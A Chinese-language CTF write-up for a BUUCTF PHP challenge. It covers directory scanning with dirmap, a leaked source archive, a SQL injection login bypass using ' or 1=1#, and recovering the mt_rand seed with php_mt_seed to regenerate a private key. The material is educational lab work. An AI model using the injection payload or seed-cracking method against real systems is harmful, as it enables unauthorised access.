一道很有意思的php伪随机数的题。
在这里我们需要使用到一个比dirsearch更加厉害的dirmap,dirmap下载教程。
在dirmap.py文件目录之下打开命令窗口进行一个扫描。
python dirmap.py -i http://315d03de-0442-45a6-ba82-0ce0d24ed7c4.node5.buuoj.cn:81/ -lcf
进行一个扫描,可以看到扫描出
按住CTRL单点即可跳转到网页,login.html一个登录界面(这里我能扫出login.html是因为我自己下载了一个字典,原始字典扫不出。)大家在代码审计时也可以找到login.html页面。字典下载
还下载了一个www.zip文件,解压后可以看到有一个index.php,点开进行一个代码审计。
<?php
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
$username = $_POST['username'];
$password = $_POST['password'];
$Private_key = $_POST['Private_key'];
if (($username == '') || ($password == '') ||($Private_key == '')) {
// 若为空,视为未填写,提示错误,并3秒后返回登录界面
header('refresh:2; url=login.html');
echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
exit;
}
else if($Private_key != '*************' )
{
header('refresh:2; url=login.html');
echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
exit;
}
else{
if($Private_key === '************'){
$getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';';
$link=mysql_connect("localhost","root","root");
mysql_select_db("test",$link);
$result = mysql_query($getuser);
while($row=mysql_fetch_assoc($result)){
echo "<tr><td>".$row["username"]."</td><td>".$row["flag"]."</td><td>";
}
}
}
}
// genarate public_key
function public_key($length = 16) {
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$public_key = '';
for ( $i = 0; $i < $length; $i++ )
$public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
return $public_key;
}
//genarate private_key
function private_key($length = 12) {
$strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$private_key = '';
for ( $i = 0; $i < $length; $i++ )
$private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
return $private_key;
}
$Public_key = public_key();
//$Public_key = KVQP0LdJKRaV3n9D how to get crispr's private_key???
划重点:
$getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';';
//这一句指出我们的登录用户为cirspr密码我们可以使用一个
万能密码:' or 1=1#
这样我们还缺少一个私钥即可得到flag
然后可以看到是一个很经典的php伪随机数的题。
我们可以进行一次测试来证实一下,php的随机数有漏洞,就是每一次的随机数都是固定的。是不是理解不来了。
菜鸟编辑器(PHP Version => 7.4.1)
是四个数
1495656191 1531059894 614479551 920134305
本地Phpstorm进行测试(PHP Version => 7.4.1)
可以看到数据和上面一模一样。
本地Phpstorm进行测试(PHP Version => 5.3.29)
可以发现结果却不一样。
这是因为在相同的php版本之下随机数是固定的,那么以此我们可以推断出原随机数种子。然后根据代码推断出私钥。
查看原网站的配置的php版本是:PHP/5.6.40
我们先将给出的一个私钥$Public_key = KVQP0LdJKRaV3n9D来进行一个逆推。
先利用python脚本转换成一个数列
str1='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
str2='KVQP0LdJKRaV3n9D'
str3 = str1[::-1]
length = len(str2)
res=''
for i in range(len(str2)):
for j in range(len(str1)):
if str2[i] == str1[j]:
res+=str(j)+' '+str(j)+' '+'0'+' '+str(len(str1)-1)+' '
break
print(res)
得到数列
36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61
我们需要使用kali的一个php_mt_seed来进行逆推php_mt_seed下载教程(直接在kali下文件)。
打开php_mt_seed文件夹:
cd php_mt_seed
打开php_mt_seed文件夹下php_mt_seed-4.0:
cd php_mt_seed-4.0
运行指令:
/php_mt_seed 36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61
如果不熟悉kali指令的话,这里大家可以直接在对应的系统文件下打开终端。
随机数种子为:seed = 0x69cf57fb = 1775196155 (PHP 5.2.1 to 7.0.x; HHVM)很适用于我们网站配置的PHP/5.6.40版本
所以随机数的种子就是1775196155
然后我们进行反推:
<?php
mt_srand(1775196155);
function public_key($length = 16) {
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$public_key = '';
for ( $i = 0; $i < $length; $i++ )
$public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
return $public_key;
}
function private_key($length = 12) {
$strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$private_key = '';
for ( $i = 0; $i < $length; $i++ )
$private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
return $private_key;
}
echo public_key();
echo "\n";
echo private_key();
?>
运行代码得到(这里我们配置的是PHP/5.6.40)
将得到我们的私钥:XuNhoueCDCGc
进行登录就得到flag
php伪随机数的题还有一道枯燥的抽奖大家可以进行一个活灵活现的学习应用。